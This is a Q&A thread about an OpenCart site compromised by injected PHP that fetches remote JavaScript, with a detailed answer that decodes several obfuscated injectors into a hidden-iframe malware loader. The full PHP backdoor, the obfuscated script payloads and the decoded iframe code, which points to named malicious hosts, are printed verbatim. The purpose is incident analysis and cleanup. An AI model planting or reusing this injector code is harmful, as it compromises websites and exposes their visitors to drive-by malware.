# Opencart: Ajax json response unknown characters

Tags: php, ajax, json, opencart, code-injection

I am working on e-commerce website. It was working fine but suddenly all ajax functions didn't work. 
When I checked the ajax code in firebug I can see some js strings are attached with that response:

```
  {"success":"Success: You have added <a href=\"http:\/\/www.test.com\/exmple\">sample<\/a> to your <a href=\"http:\/\/www.test.com
   \/index.php?route=checkout\/cart\">shopping cart<\/a>!","total":"2070
   items","amount":"$2,028.60"} <script>e=eval;v="0"+"x";a=0;try{a&=2}catch(q){a=1}if(!a)
   {try{document["\x62ody"]^=~1;}catch(q) {a2="_"}z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
```

I am getting this error in firefox only....

This is what they added into the index.php file.

```
            <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
            $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                @$stCurlHandle = curl_init( $stCurlLink ); 
        }
        } 
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
        $sResult = @curl_exec($stCurlHandle); 
        if ($sResult[0]=="O") 
         {$sResult[0]=" ";
          echo $sResult; // Statistic code end
          }
        curl_close($stCurlHandle); 
    }
    }
    ?>
```

I just removed the code now its working fine...

Comment: You are not telling us what happened around the time it "suddenly" stopped working. Did anything change in Firefox at that time? Did anything change on the Opencart end? Did you add any extensions or plugins? For something to suddenly stop working, then something must have changed somewhere in the chain from the Opencart source and template code right through to the browser and OS of the computer viewing the site. Find that, and you will most likely have your answer.

Comment: Does the Opencart shop return the same data to Chrome browser?

Comment: The \x62ody encoding is a bit suspect. Could it be the site has been compromised?

Comment: Hi its working fine in chrome. I just checked the response data in chrome, it looks fine. i have problem in firefox only...

Comment: Post the whole AJAX response - the part You have provided is broken. Anyway this could be a work of hacker or wrong extension installed... In Firefox check Your webpages source code (in browser) and look for similar `<script>` code. Probably some extension You have installed contains this hacking JS code and could be stealing Your session or tracking the user's input, etc...

Comment: Yes dude...i found the hack code...

Comment: Thanks greyman and shadyyx.... :-)....

Answer (score 18):

To bad you didn't give us the full javascript that php injected (*please* add it to your question if you still have it, so we can [**decode**](http://fiddle.jshell.net/J4WLX/show/) it). But thank you so much for sharing the php behind it!!!

Removing the php script is indeed the solution, **but** *you should find out how you got 'hacked'/'infected' in the first place*!!

- Maybe a weak password or rather new vulnerability?
- Also, all the computers of developers/maintainers/contributers that have (had) (ftp/admin/cms) access to your website, must be checked for password-stealing/sniffing malware (as a result of visiting your/another infected website).
- Installed a rouge plugin/module on your website/server?
- It is also possible that the whole server (and all websites on it) is comprimized. It might be wise to contact your hoster to.

**Note** that such malware is often picked up by google: they'll add a warning to such a hacked website's index: '[This site may harm your computer.](http://www.google.com/support/bin/answer.py?answer=45449&topic=360&hl=en)'
Getting this notion removed requires a '[Request a malware-review](http://support.google.com/webmasters/bin/answer.py?hl=en&answer=168328)' with google webmaster-tools (I don't know if google will automatically rescan your page in x amount of time if you don't report your page as fixed, neither do I know if you can report your page as fixed without google-webmaster tools, so be warned if you don't want to give your cellphone-number to google!!!).

If one [base64 decode](http://www.base64decode.org/)s the string `aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw` from your php-code, one gets the url: `http://mbrowserstats.com/statE/stat.php`

Your infected php-website used the above url with the `GET`-string
`?ip=YOUR_IP&useragent=YOUR_BROWSER&domainname=INFECTED_WEBSITE_DOMAIN&fullpath=INFECTED_WEBSITE_PAGE&check='.isset($_GET['look'])`
to fetch a custom unique on-demand javascript to insert in the markup served to the (*targeted!!*) visitor.

To decode the payload of that inserted visitor-unique javascript, I quickly whipped up a [**decoder**](http://jsfiddle.net/J4WLX/) (that also works for [your partial payload](http://jsfiddle.net/b3LGr/), using the character `_` as separator and an offset of **-7** on those base **16** numbers).
The (partial) string: `10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10`
decodes to:

```
        if (document.getElementsByTagName('body')[0]){
```

---

I want to share my analysis of the variant I got, to explain how it works (hoping it will help others):
The website I visited (in palemoon=firefox) suddenly started java and a cmd-box popped up.
*Cr@p.*
'View source' of the document, revealed an obfuscated script that was 'served' (inserted) *before* the `html` tag (with a leading space):

```
 <script>w=window;aq="0"+"x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+640!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}</script>
<html>
<head>
<title> etcetera...
```

Running it through [jsbeautifier.org](http://jsbeautifier.org/) cleaned that up (before I added my human parsing comments) to:

```
w = window;                          //hmmkay, note:reused lateron
aq = "0" + "x";                      //so.. '0x', smells like hex
ff = String;                         //haha, neat, ff is String
ff = ff.fromCharCode;                //and ff is now String's fromCharCode method
try {
    document["\x62ody"] ^= ~1;       //I'm guessing this should fail
} catch (d21vd12v) {                 //so all the rest gets executed:
    v = 123;                         //bliep? 42? Here be dragons.. aka useless
    vzs = false;                     //ahh, can you guess where this leads?
    try {                            //no idea why this test is here
        document;
    } catch (q) {                    //but for an infection this should NOT run
        vzs = 1;
    }
    if (!vzs) e = w["eval"];         //false will become true so e = EVIL
    if (1) {                         //lol, if true, ok...
                                     //ahh, f the payload, an array (by split) of
                                     //640 hex-numbers
        f = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74" ["split"](",");
    }
    w = f;                           //ahh juggling w to f
    s = [];                          //preparing s to receive the decoded string
    for (i = 2 - 2; - i + 640 != 0; i += 1) {  //haha, ok: ( 2-2=0; lol; i++ )
        j = i;                       //juggle artist at it again
        if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 9);  //9 offset
    }  // 31oct = 19hex = 25 = true, if eval, LOOK MA, WITHOUT parseInt being EVIL
    fafa = e;                        //ok stop juggling. fafa = EVIL
    fafa(s)                          //there we go: EVIL(decoded string)
}
```

As one can now read, they jump through a lot of hoops to fool virus-scanners.

I re-factored this (for my understanding) to:

```
w = "/*PAYLOAD: comma separated uni-code characters in hex*/" ["split"](",");
s = '';
for (i = 0; i < 640; i++) {
    s += String.fromCharCode(  parseInt(w[i],16) + 9  );  //decode
}
eval(s)                                                   //execute
```

Using my decoder (set to base `16`, separation character `,` and offset `9`) [the payload decoded](http://jsfiddle.net/WJmdB/) to:

```
if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751');f.style.left='-10000px';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

Note that this resulting code is indented with 2 and 3 *tabs* (amateur or fooling virusscan?) that I removed for readability. Also the line-endings are CR (13dec) (is the author/script-kiddie using an older MAC?).

So, now we have all the code we can (finally) simply explain what is happening:

- the PHP script `curl`'s a visitor/website unique javascript to inject in served markup
- this (by PHP) injected javascript will inject an `iframe` in the document's `body` (gallantly aided by the browser since body doesn't exist yet), positioned `-10000px` from the left (out of sight) in the visited page (on the visitors browser) and
- the injected `iframe` loads a specifically targeted (at user and website the user is visiting) external page (containing god knows what kind of mess/malware/virus/rootkit, in my case from `rotatethespin.com:8000`, `muruno-vaser.info:8000`, `epomota.com` etc.).

I also verified this by getting the document's live html with this bookmarklet:

```
javascript:(function(){ alert(document.documentElement.innerHTML); })()
```

This also showed the injected iframe code in the source.

I used the next bookmarklet to move the iframe into view (assuming there is just 1 iframe):

```
javascript:(function(){ document.getElementsByTagName('iframe')[0].style.left='0px'; })()
```

Naturally one could also use firebug and similar tools (depending on browser).

I also noticed that when using most webbased tools (or even w3c validator) to fetch the source of the infected website, php did not insert the javascript, **making the website look not infected**!
I also had this 'problem' when trying a simple telnet-command to (safely) get the infected code. However after seeing the php code behind it, I realized I used to few HTTP commands (specifically the referrer).
Doing: [`telnet infected-site.com 80`](http://telnet.browseas.com/telnet.php) and then pasting the following finally gave the infected markup source:

```
GET /path.php?page=something HTTP/1.1
Host: infected-site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: nl,en-us;q=0.7,en;q=0.3
Referer: http://infected-site.com/index.php
Connection: Close
```

Note that this way one can also safely explore (and reverse-engineer) the source of the iframe etc!!

I also noticed that the website-owner's computer also *did not* get the infected code! This is either because his machine is infected *or* because the the server that distributes the javascripts did not provide a script because it knew that client-machine was already infected.

**Update:** having a working set of tools in this answer, I re-checked the comprised website today (after a good night rest) and got totally different script injected (but still based on the same techniques I explained in this answer).

```
<script>ss=eval("Str"+"ing");d=document;a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>
```

Note that this time the numbers are in octal (base 8) (separated by `,` with an offset of `-4`).
So I updated my decoder to include a base/radix setting (and all the depending links in this answer) and as one can [see the payload](http://jsfiddle.net/WJmdB/1/) is still the same (apart from the domain it points to).

---

I found this question by [googling `document\["\x62ody"\] ^= ~1`](http://www.google.com/search?q=document%5B%22%5Cx62ody%22%5D%20%5E=%20~1;) which gave (mostly useless/infected) 834 results.

The malware I stumbled upon today had the above string and the pretty unique string [`'d21vd12v'`](http://www.google.com/search?q=d21vd12v) inside it, which gives 8300 (also mostly useless/infected) results.

However [googling '// This code use for global bot statistic'](http://www.google.com/search?q=//%20This%20code%20use%20for%20global%20bot%20statistic) (found in the php you supplied in your question) rendered over 4.1 million results (dating back to at least 2010), indicating that also wordpress, joomla, etc are victim of this 'technique'.

Reading some of those links (like [this](https://security.stackexchange.com/questions/14729/malware-code-added-when-site-viewed-externally), [this](https://www.badwarebusters.org/main/itemview/28223) or [this](http://www.peterrosenmai.com/a-hacking-visible-only-to-google)) I get the impression this started out as a way to fool search-engines (like google) in order to increase page-ranking. This at the price of creating a self-inflicted malware-hole.
Naturally the variants that specialize in distributing malware now try to hide themselves from the search-engines.

Comment: Thanks very helpful analysis of what this beast is doing

Comment: Wow. This is ingenious

Answer (score 1):

This looks like "injected" code, leading to another URL serving the blackhole exploit kit.